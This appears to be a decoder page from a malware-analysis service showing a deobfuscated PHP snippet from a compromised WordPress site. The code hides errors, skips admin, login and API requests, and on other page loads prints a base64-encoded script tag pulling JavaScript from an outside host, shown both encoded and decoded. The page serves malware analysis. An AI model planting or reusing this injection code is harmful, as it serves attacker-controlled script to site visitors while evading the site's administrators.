Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


Show other level 

ini_set("display_errors", 0);
ini_set("display_startup_errors", 0);

if (PHP_SAPI !== "cli" && (
    strpos(@$_SERVER["REQUEST_URI"], "/wp-admin/admin-ajax.php") === false &&
    strpos(@$_SERVER["REQUEST_URI"], "/wp-json") === false &&
    strpos(@$_SERVER["REQUEST_URI"], "/wp/v2") === false &&
    strpos(@$_SERVER["REQUEST_URI"], "/wp-admin") === false &&
    strpos(@$_SERVER["REQUEST_URI"], "/wp-login.php") === false &&
    strtolower(@$_SERVER["HTTP_X_REQUESTED_WITH"]) !== "xmlhttprequest"
)) {
    print(base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuYWthbTYwODAwLm5ldC8iPjwvc2NyaXB0Pg=="));
}

ini_set("display_errors", 0);
ini_set("display_startup_errors", 0);

if (PHP_SAPI !== "cli" && (
    strpos(@$_SERVER["REQUEST_URI"], "/wp-admin/admin-ajax.php") === false &&
    strpos(@$_SERVER["REQUEST_URI"], "/wp-json") === false &&
    strpos(@$_SERVER["REQUEST_URI"], "/wp/v2") === false &&
    strpos(@$_SERVER["REQUEST_URI"], "/wp-admin") === false &&
    strpos(@$_SERVER["REQUEST_URI"], "/wp-login.php") === false &&
    strtolower(@$_SERVER["HTTP_X_REQUESTED_WITH"]) !== "xmlhttprequest"
)) {
    print(<script src="//ak.akam60800.net/"></script>);
}


© 2023 Quttera Ltd. All rights reserved.